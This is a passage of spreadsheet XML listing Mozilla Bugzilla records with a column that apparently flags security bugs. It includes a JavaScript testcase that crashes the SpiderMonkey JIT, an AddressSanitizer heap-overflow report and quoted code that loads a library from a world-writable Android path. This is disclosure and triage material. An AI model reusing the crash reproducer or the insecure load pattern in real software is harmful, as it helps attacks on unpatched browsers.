        <v>4</v>
      </c>
      <c r="W3321" t="inlineStr">
        <is>
          <t>I just noticed that questions seemed to be favored in search results where I was used to seeing wiki documents. So I looked at the explain and noticed that boosts are missing from the wiki_document fields :(
https://support.mozilla.org/en-US/search?esab=a&amp;q=delete+cookies&amp;explain=1
I am not sure if this is because we did the custom `process_query_text_*` and that doesn't play well with `.boost()`? (Just shooting darts here.)
Anyway, this is kind of a big issue.</t>
        </is>
      </c>
      <c r="X3321" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3322">
      <c r="A3322" t="n">
        <v>708160</v>
      </c>
      <c r="B3322" t="inlineStr">
        <is>
          <t>2011-12-06 18:34:11 -0800</t>
        </is>
      </c>
      <c r="C3322" t="inlineStr">
        <is>
          <t>Investigate talos-r4-snow-053 (it's fine), then setup after reimaging</t>
        </is>
      </c>
      <c r="D3322" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3322" t="n">
        <v>1</v>
      </c>
      <c r="F3322" t="n">
        <v>1</v>
      </c>
      <c r="G3322" t="n">
        <v>5</v>
      </c>
      <c r="H3322" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3322" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3322" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3322" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3322" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3322" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3322" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3322" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3322" t="inlineStr">
        <is>
          <t>[buildduty][buildslaves]</t>
        </is>
      </c>
      <c r="Q3322" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3322" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3322" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3322" t="n">
        <v>1</v>
      </c>
      <c r="U3322" t="n">
        <v>0</v>
      </c>
      <c r="V3322" t="n">
        <v>4</v>
      </c>
      <c r="W3322" t="inlineStr">
        <is>
          <t>talos-r4-snow-053 got rebooted last time (bug 707234), did 20 jobs OK over about 5 hours, then started having issues writing to the disk.
eg, at the end of a talos dromaeo test:
Traceback (most recent call last):
  File "bcontroller.py", line 242, in &lt;module&gt;
    sys.exit(main())
  File "bcontroller.py", line 239, in main
    bcontroller.run()
  File "bcontroller.py", line 206, in run
    results_file.close()
IOError: [Errno 6] Device not configured
Traceback (most recent call last):
  File "run_tests.py", line 596, in &lt;module&gt;
    main()
  File "run_tests.py", line 593, in main
    test_file(arg, options.screen, options.amo)
  File "run_tests.py", line 521, in test_file
    browser_dump, counter_dump, print_format = mytest.runTest(browser_config, test)
  File "/Users/cltbld/talos-slave/talos-data/talos/ttest.py", line 424, in runTest
    results_raw = results_file.read()
IOError: [Errno 6] Device not configured
and then we tried to call our reboot script:
Traceback (most recent call last):
  File "count_and_reboot.py", line 55, in &lt;module&gt;
    if increment_count(options.countfile) &gt;= options.maxcount:
  File "count_and_reboot.py", line 36, in increment_count
    open(fname, "w").write("%i\n" % current_count)
IOError: [Errno 22] invalid mode ('w') or filename: '../talos_count.txt'
Please reboot to an external disk and run a disk check on this mini.</t>
        </is>
      </c>
      <c r="X3322" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3323">
      <c r="A3323" t="n">
        <v>1503001</v>
      </c>
      <c r="B3323" t="inlineStr">
        <is>
          <t>2018-10-29 13:23:15 -0700</t>
        </is>
      </c>
      <c r="C3323" t="inlineStr">
        <is>
          <t>[traceback] AttributeError: 'unicode' object has no attribute 'get' in /monitoring/crontabber</t>
        </is>
      </c>
      <c r="D3323" t="inlineStr">
        <is>
          <t>2018-10-29 14:29:02 -0700</t>
        </is>
      </c>
      <c r="E3323" t="n">
        <v>1</v>
      </c>
      <c r="F3323" t="n">
        <v>1</v>
      </c>
      <c r="G3323" t="n">
        <v>4</v>
      </c>
      <c r="H3323" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3323" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3323" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K3323" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3323" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3323" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3323" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3323" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3323" t="inlineStr"/>
      <c r="Q3323" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3323" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3323" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3323" t="n">
        <v>1</v>
      </c>
      <c r="U3323" t="n">
        <v>0</v>
      </c>
      <c r="V3323" t="n">
        <v>4</v>
      </c>
      <c r="W3323" t="inlineStr">
        <is>
          <t>https://sentry.prod.mozaws.net/operations/socorro-new-prod/issues/4893551/
"""
AttributeError: 'unicode' object has no attribute 'get'
  File "django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "crashstats/crashstats/utils.py", line 56, in wrapper
    response = f(request, *args, **kw)
  File "crashstats/monitoring/views.py", line 27, in crontabber_status
    all_apps = api.get()['state']
  File "crashstats/crashstats/models.py", line 1007, in get
    'type': last_error.get('type', 'Unknown')
"""
This just started happening after we pushed out changes to crontabber to prod. It's entirely possible it's because the table is empty and once we get stuff in the table, it'll go away.
Even so, it's worth fixing it. This bug covers that.</t>
        </is>
      </c>
      <c r="X3323" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3324">
      <c r="A3324" t="n">
        <v>1254122</v>
      </c>
      <c r="B3324" t="inlineStr">
        <is>
          <t>2016-03-07 06:36:08 -0800</t>
        </is>
      </c>
      <c r="C3324" t="inlineStr">
        <is>
          <t>Assertion failure: returnAddr &gt; method_-&gt;raw(), at js/src/jit/BaselineJIT.cpp:731 with OOM and TypedObject</t>
        </is>
      </c>
      <c r="D3324" t="inlineStr">
        <is>
          <t>2016-09-22 17:19:26 -0700</t>
        </is>
      </c>
      <c r="E3324" t="n">
        <v>1</v>
      </c>
      <c r="F3324" t="n">
        <v>1</v>
      </c>
      <c r="G3324" t="n">
        <v>3</v>
      </c>
      <c r="H3324" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3324" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3324" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3324" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3324" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3324" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3324" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3324" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3324" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main46+][adv-esr45.1+]</t>
        </is>
      </c>
      <c r="Q3324" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3324" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3324" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T3324" t="n">
        <v>1</v>
      </c>
      <c r="U3324" t="n">
        <v>0</v>
      </c>
      <c r="V3324" t="n">
        <v>17</v>
      </c>
      <c r="W3324" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision b6acf4d4fc20 (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-debug, run with --fuzzing-safe --thread-count=2):
for (lfLocal in this) {}
function foo() {
var T = TypedObject;
var ObjectStruct = new T.StructType({
    f: T.Object
});
var o = new ObjectStruct();
function writeObject(o, v, expected) {
    o.f = v;
}
for (var i = 0; i &lt; 5; i++)
    writeObject(o, {}, "helo");
for (var i = 0; i &lt; 5; i++)
    writeObject(o, null, "null");
writeObject(o, "three", "three");
for (var i = 0; oomAfterAllocations(1); i++)
    writeObject(o, 4.5, "4.5");
writeObject(o, undefined, "");
for (var i = 0;
    (class get {}.get++) &lt; 5; i++)
    writeString(s, 4.5, "4.5");var lfcode = new Array();
} foo();
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
0x00000000005f94cc in js::jit::BaselineScript::icEntryFromReturnAddress (this=&lt;optimized out&gt;, returnAddr=&lt;optimized out&gt;) at js/src/jit/BaselineJIT.cpp:731
#0  0x00000000005f94cc in js::jit::BaselineScript::icEntryFromReturnAddress (this=&lt;optimized out&gt;, returnAddr=&lt;optimized out&gt;) at js/src/jit/BaselineJIT.cpp:731
#1  0x00000000006bc0fd in js::jit::JitFrameIterator::baselineScriptAndPc (this=this@entry=0x7fffffffae50, scriptRes=scriptRes@entry=0x0, pcRes=pcRes@entry=0x7fffffffad90) at js/src/jit/JitFrames.cpp:238
#2  0x00000000006e329d in js::jit::HandleException (rfe=&lt;optimized out&gt;) at js/src/jit/JitFrames.cpp:834
#3  0x00007ffff7fe8608 in ?? ()
#4  0x0000000000000000 in ?? ()
rax	0x0	0
rbx	0x7fffffffae50	140737488334416
rcx	0x7ffff6ca588d	140737333844109
rdx	0x0	0
rsi	0x7ffff6f7a9d0	140737336814032
rdi	0x7ffff6f791c0	140737336807872
rbp	0x7fffffffaca0	140737488333984
rsp	0x7fffffffaca0	140737488333984
r8	0x7ffff7fdf7c0	140737354004416
r9	0x6372732f736a2f6c	7165916604736876396
r10	0x7fffffffaa60	140737488333408
r11	0x7ffff6c27ee0	140737333329632
r12	0x7ffff7ea1090	140737352700048
r13	0x7fffffffad90	140737488334224
r14	0x0	0
r15	0x7fffffffae50	140737488334416
rip	0x5f94cc &lt;js::jit::BaselineScript::icEntryFromReturnAddress(unsigned char*)+60&gt;
=&gt; 0x5f94cc &lt;js::jit::BaselineScript::icEntryFromReturnAddress(unsigned char*)+60&gt;:	movl   $0x2db,0x0
   0x5f94d7 &lt;js::jit::BaselineScript::icEntryFromReturnAddress(unsigned char*)+71&gt;:	callq  0x4a6f30 &lt;abort()&gt;
Marking this s-s because the assertion doesn't look safe to me. If it depends on TypedObject, it might be Nightly-only.</t>
        </is>
      </c>
      <c r="X3324" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3325">
      <c r="A3325" t="n">
        <v>272336</v>
      </c>
      <c r="B3325" t="inlineStr">
        <is>
          <t>2004-11-29 18:03:10 -0800</t>
        </is>
      </c>
      <c r="C3325" t="inlineStr">
        <is>
          <t>array_sort uses GC-unsafe temporary memory to hold jsvals</t>
        </is>
      </c>
      <c r="D3325" t="inlineStr">
        <is>
          <t>2005-10-13 19:22:01 -0700</t>
        </is>
      </c>
      <c r="E3325" t="n">
        <v>1</v>
      </c>
      <c r="F3325" t="n">
        <v>1</v>
      </c>
      <c r="G3325" t="n">
        <v>3</v>
      </c>
      <c r="H3325" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3325" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3325" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3325" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3325" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3325" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3325" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3325" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3325" t="inlineStr"/>
      <c r="Q3325" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3325" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3325" t="inlineStr">
        <is>
          <t>mozilla1.8alpha6</t>
        </is>
      </c>
      <c r="T3325" t="n">
        <v>1</v>
      </c>
      <c r="U3325" t="n">
        <v>0</v>
      </c>
      <c r="V3325" t="n">
        <v>14</v>
      </c>
      <c r="W3325" t="inlineStr">
        <is>
          <t>01010113()	
 	js3250.dll!js_Interpret(JSContext * cx=0x02a38600, long * 
result=0x0012ce38)  Line 2800 + 0x213	C
 	js3250.dll!js_Invoke(JSContext * cx=0x00acb7d2, unsigned int 
argc=44271104, unsigned int flags=1232440)  Line 958 + 0xa	C
 	js3250.dll!js_InternalInvoke(JSContext * cx=0x06e8c0e4, JSObject * 
obj=0x027fc860, long fval=41928824, unsigned int flags=0, unsigned int argc=2, 
long * argv=0x0012cef0, long * rval=0x0012cf08)  Line 1035 + 0xe	C
 	js3250.dll!sort_compare(const void * a=0x072b0c30, const void * 
b=0x072b0c34, void * arg=0x0012cf9c)  Line 769 + 0x55	C
 	js3250.dll!HeapSortHelper(int building=1, HSortArgs * hsa=0x05b4fd98, 
unsigned int lo=109, unsigned int hi=313)  Line 691 + 0x20	C
 	js3250.dll!js_HeapSort(void * vec=0x072b08d0, unsigned int nel=313, 
unsigned int elsize=4, int (const void *, const void *, void *)* 
cmp=0x00ab6074, void * arg=0x0012cf9c)  Line 725 + 0xc	C
&gt;	js3250.dll!array_sort(JSContext * cx=0x02a38600, JSObject * 
obj=0x027fbca0, unsigned int argc=313, long * argv=0x06e8c0dc, long * 
rval=0x0012d010)  Line 889 + 0x30	C
 	js3250.dll!js_Invoke(JSContext * cx=0x00acb7d2, unsigned int 
argc=44271104, unsigned int flags=1232440)  Line 941 + 0x11	C</t>
        </is>
      </c>
      <c r="X3325" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3326">
      <c r="A3326" t="n">
        <v>1415291</v>
      </c>
      <c r="B3326" t="inlineStr">
        <is>
          <t>2017-11-07 12:14:13 -0800</t>
        </is>
      </c>
      <c r="C3326" t="inlineStr">
        <is>
          <t>Heap-buffer-overflow READ 8 · js::WasmTableObject::getImpl</t>
        </is>
      </c>
      <c r="D3326" t="inlineStr">
        <is>
          <t>2019-08-22 09:25:17 -0700</t>
        </is>
      </c>
      <c r="E3326" t="n">
        <v>1</v>
      </c>
      <c r="F3326" t="n">
        <v>1</v>
      </c>
      <c r="G3326" t="n">
        <v>3</v>
      </c>
      <c r="H3326" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3326" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3326" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3326" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3326" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3326" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3326" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3326" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3326" t="inlineStr">
        <is>
          <t>[adv-main58+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q3326" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3326" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3326" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T3326" t="n">
        <v>1</v>
      </c>
      <c r="U3326" t="n">
        <v>0</v>
      </c>
      <c r="V3326" t="n">
        <v>23</v>
      </c>
      <c r="W3326" t="inlineStr">
        <is>
          <t>Created attachment 8926053
clusterfuzz-testcase-6215596157960192.js
This bug was found by Google's OSS-Fuzz running their custom internal JS fuzzer. I am refiling it in our issue tracker.
Please note that they apply a 90-day disclose timeline to all bugs:
[Environment] ASAN_OPTIONS = redzone=256:strict_memcmp=0:allow_user_segv_handler=1:allocator_may_return_null=1:handle_sigfpe=1:handle_sigbus=1:detect_stack_use_after_return=0:alloc_dealloc_mismatch=0:print_scariness=1:max_uar_stack_size_log=16:detect_odr_violation=0:handle_sigill=1:coverage=0:use_sigaltstack=1:fast_unwind_on_fatal=1:detect_leaks=0:print_summary=1:handle_abort=1:check_malloc_usable_size=0:detect_container_overflow=1:symbolize=0:handle_segv=1
	=================================================================
	==13600==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6110001b4c80 at pc 0x0000028d59ae bp 0x7ffdebc428b0 sp 0x7ffdebc428a8
	READ of size 8 at 0x6110001b4c80 thread T0
	SCARINESS: 23 (8-byte-read-heap-buffer-overflow)
	#0 0x28d59ad in js::WasmTableObject::getImpl(JSContext*, JS::CallArgs const&amp;) mozilla-central/js/src/wasm/WasmJS.cpp:1719:15
	#1 0x28d5ea4 in bool JS::CallNonGenericMethod&lt;&amp;(IsTable(JS::Handle&lt;JS::Value&gt;)), &amp;js::WasmTableObject::getImpl&gt;(JSContext*, JS::CallArgs const&amp;) mozilla-central/js/src/build_DBG.OBJ/dist/include/js/CallNonGenericMethod.h:100:16
	#2 0x28d5ea4 in js::WasmTableObject::get(JSContext*, unsigned int, JS::Value*) mozilla-central/js/src/wasm/WasmJS.cpp:1741
	#3 0x8bb754 in js::CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) mozilla-central/js/src/jscntxtinlines.h:291:15
	#4 0x8bb754 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) mozilla-central/js/src/vm/Interpreter.cpp:472
	#5 0x8a5edd in js::CallFromStack(JSContext*, JS::CallArgs const&amp;) mozilla-central/js/src/vm/Interpreter.cpp:527:12
	#6 0x8a5edd in Interpret(JSContext*, js::RunState&amp;) mozilla-central/js/src/vm/Interpreter.cpp:3061
	    #7 0x885088 in js::RunScript(JSContext*, js::RunState&amp;) mozilla-central/js/src/vm/Interpreter.cpp:422:12
	    #8 0x8c10d4 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) mozilla-central/js/src/vm/Interpreter.cpp:705:15
	    #9 0x8c1dc6 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) mozilla-central/js/src/vm/Interpreter.cpp:737:12
	    #10 0x1894d40 in ExecuteScript(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSScript*&gt;, JS::Value*) mozilla-central/js/src/jsapi.cpp:4702:12
	    #11 0x1895267 in JS_ExecuteScript(JSContext*, JS::Handle&lt;JSScript*&gt;) mozilla-central/js/src/jsapi.cpp:4735:12
	    #12 0x5d5d8d in RunFile(JSContext*, char const*, _IO_FILE*, bool) mozilla-central/js/src/shell/js.cpp:695:14
	    #13 0x5d5d8d in Process(JSContext*, char const*, bool, FileKind) mozilla-central/js/src/shell/js.cpp:1048
	    #14 0x56a13f in ProcessArgs(JSContext*, js::cli::OptionParser*) mozilla-central/js/src/shell/js.cpp:8175:14
	    #15 0x56a13f in Shell(JSContext*, js::cli::OptionParser*, char**) mozilla-central/js/src/shell/js.cpp:8547
	    #16 0x56a13f in main mozilla-central/js/src/shell/js.cpp:8960
	    #17 0x7fe5647af82f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/libc-start.c:291
	0x6110001b4c81 is located 0 bytes to the right of 1-byte region [0x6110001b4c80,0x6110001b4c81)
	allocated by thread T0 here:
	#0 0x51a0f0 in __interceptor_calloc _asan_rtl_
	#1 0x291ef2f in js_calloc(unsigned long) mozilla-central/js/src/build_DBG.OBJ/dist/include/js/Utility.h:376:12
	#2 0x291ef2f in js::wasm::ExternalTableElem* js_pod_calloc&lt;js::wasm::ExternalTableElem&gt;(unsigned long) mozilla-central/js/src/build_DBG.OBJ/dist/include/js/Utility.h:571
	#3 0x291ef2f in js::wasm::ExternalTableElem* js::MallocProvider&lt;JSContext&gt;::maybe_pod_calloc&lt;js::wasm::ExternalTableElem&gt;(unsigned long) mozilla-central/js/src/vm/MallocProvider.h:62
	#4 0x291ef2f in js::wasm::ExternalTableElem* js::MallocProvider&lt;JSContext&gt;::pod_calloc&lt;js::wasm::ExternalTableElem&gt;(unsigned long) mozilla-central/js/src/vm/MallocProvider.h:132
	#5 0x28d2f4f in js::wasm::Table::create(JSContext*, js::wasm::TableDesc const&amp;, JS::Handle&lt;js::WasmTableObject*&gt;) mozilla-central/js/src/wasm/WasmTable.cpp:52:35
	#6 0x28d2354 in js::WasmTableObject::create(JSContext*, js::wasm::Limits const&amp;) mozilla-central/js/src/wasm/WasmJS.cpp:1619:25
	#7 0x28d3b0e in js::WasmTableObject::construct(JSContext*, unsigned int, JS::Value*) mozilla-central/js/src/wasm/WasmJS.cpp:1674:37
	#8 0x8efb57 in js::CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) mozilla-central/js/src/jscntxtinlines.h:291:15
	#9 0x8efb57 in js::CallJSNativeConstructor(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) mozilla-central/js/src/jscntxtinlines.h:324
	#10 0x8bea61 in InternalConstruct(JSContext*, js::AnyConstructArgs const&amp;) mozilla-central/js/src/vm/Interpreter.cpp:567:20
	#11 0x8a55c1 in Interpret(JSContext*, js::RunState&amp;) mozilla-central/js/src/vm/Interpreter.cpp:3053:18
	    #12 0x885088 in js::RunScript(JSContext*, js::RunState&amp;) mozilla-central/js/src/vm/Interpreter.cpp:422:12
	    #13 0x8c10d4 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) mozilla-central/js/src/vm/Interpreter.cpp:705:15
	    #14 0x8c1dc6 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) mozilla-central/js/src/vm/Interpreter.cpp:737:12
	    #15 0x1894d40 in ExecuteScript(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSScript*&gt;, JS::Value*) mozilla-central/js/src/jsapi.cpp:4702:12
	    #16 0x1895267 in JS_ExecuteScript(JSContext*, JS::Handle&lt;JSScript*&gt;) mozilla-central/js/src/jsapi.cpp:4735:12
	    #17 0x5d5d8d in RunFile(JSContext*, char const*, _IO_FILE*, bool) mozilla-central/js/src/shell/js.cpp:695:14
	    #18 0x5d5d8d in Process(JSContext*, char const*, bool, FileKind) mozilla-central/js/src/shell/js.cpp:1048
	    #19 0x56a13f in ProcessArgs(JSContext*, js::cli::OptionParser*) mozilla-central/js/src/shell/js.cpp:8175:14
	    #20 0x56a13f in Shell(JSContext*, js::cli::OptionParser*, char**) mozilla-central/js/src/shell/js.cpp:8547
	    #21 0x56a13f in main mozilla-central/js/src/shell/js.cpp:8960
	    #22 0x7fe5647af82f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/libc-start.c:291
	SUMMARY: AddressSanitizer: heap-buffer-overflow (/mnt/scratch0/clusterfuzz/slave-bot/builds/clusterfuzz-builds-no-engine_spidermonkey_6aad6e0d14f81d36f48dbd887aa56b38e87859f7/revisions/js+0x28d59ad)
	Shadow bytes around the buggy address:
	0x0c228002e940: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
	0x0c228002e950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
	0x0c228002e960: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
	0x0c228002e970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
	0x0c228002e980: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
	=&gt;0x0c228002e990:[01]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
	0x0c228002e9a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
	0x0c228002e9b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
	0x0c228002e9c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
	0x0c228002e9d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
	0x0c228002e9e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3600==ABORTING</t>
        </is>
      </c>
      <c r="X3326" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3327">
      <c r="A3327" t="n">
        <v>1527534</v>
      </c>
      <c r="B3327" t="inlineStr">
        <is>
          <t>2019-02-12 18:44:31 -0800</t>
        </is>
      </c>
      <c r="C3327" t="inlineStr">
        <is>
          <t>On Android, Gecko always tries to load a library from an all-user-writable path APITRACE_LIB</t>
        </is>
      </c>
      <c r="D3327" t="inlineStr">
        <is>
          <t>2019-08-07 17:25:45 -0700</t>
        </is>
      </c>
      <c r="E3327" t="n">
        <v>1</v>
      </c>
      <c r="F3327" t="n">
        <v>1</v>
      </c>
      <c r="G3327" t="n">
        <v>3</v>
      </c>
      <c r="H3327" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3327" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3327" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K3327" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3327" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3327" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N3327" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3327" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3327" t="inlineStr">
        <is>
          <t>gfx-noted[post-critsmash-triage][adv-main66+]</t>
        </is>
      </c>
      <c r="Q3327" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3327" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3327" t="inlineStr">
        <is>
          <t>mozilla67</t>
        </is>
      </c>
      <c r="T3327" t="n">
        <v>1</v>
      </c>
      <c r="U3327" t="n">
        <v>0</v>
      </c>
      <c r="V3327" t="n">
        <v>15</v>
      </c>
      <c r="W3327" t="inlineStr">
        <is>
          <t>https://searchfox.org/mozilla-central/rev/cb7faaf6b4ad2528390186f1ce64618dea71031e/gfx/gl/GLLibraryEGL.h#21
```
#ifdef ANDROID
// We only need to explicitly dlopen egltrace
// on android as we can use LD_PRELOAD or other tricks
// on other platforms. We look for it in /data/local
// as that's writeable by all users
//
// This should really go in GLLibraryEGL.cpp but we currently reference
// APITRACE_LIB in GLContextProviderEGL.cpp. Further refactoring
// will come in subsequent patches on Bug 732865
#  define APITRACE_LIB "/data/local/tmp/egltrace.so"
#endif
```
We should not be loading libraries from locations that other apps can write to. It sounds like might be the case here.
This should be opt-in, maybe by pref.</t>
        </is>
      </c>
      <c r="X3327" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3328">
      <c r="A3328" t="n">
        <v>930534</v>
      </c>
      <c r="B3328" t="inlineStr">
        <is>
          <t>2013-10-24 07:06:14 -0700</t>
        </is>
      </c>
      <c r="C3328" t="inlineStr">
        <is>
          <t>[Buri][language] Wrong time format in the statusbar of RO</t>
        </is>
      </c>
      <c r="D3328" t="inlineStr">
        <is>
          <t>2015-03-20 02:13:44 -0700</t>
        </is>
      </c>
      <c r="E3328" t="n">
        <v>1</v>
      </c>
      <c r="F3328" t="n">
        <v>1</v>
      </c>
      <c r="G3328" t="n">
        <v>2</v>
      </c>
      <c r="H3328" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3328" t="inlineStr">
        <is>
          <t>Mozilla Localizations</t>
        </is>
      </c>
      <c r="J3328" t="inlineStr">
        <is>
          <t>ro / Romanian</t>
        </is>
      </c>
      <c r="K3328" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3328" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3328" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3328" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3328" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3328" t="inlineStr">
        <is>
          <t>[ro][l10n]</t>
        </is>
      </c>
      <c r="Q3328" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3328" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3328" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3328" t="n">
        <v>1</v>
      </c>
      <c r="U3328" t="n">
        <v>0</v>
      </c>
      <c r="V3328" t="n">
        <v>8</v>
      </c>
      <c r="W3328" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #929913 +++
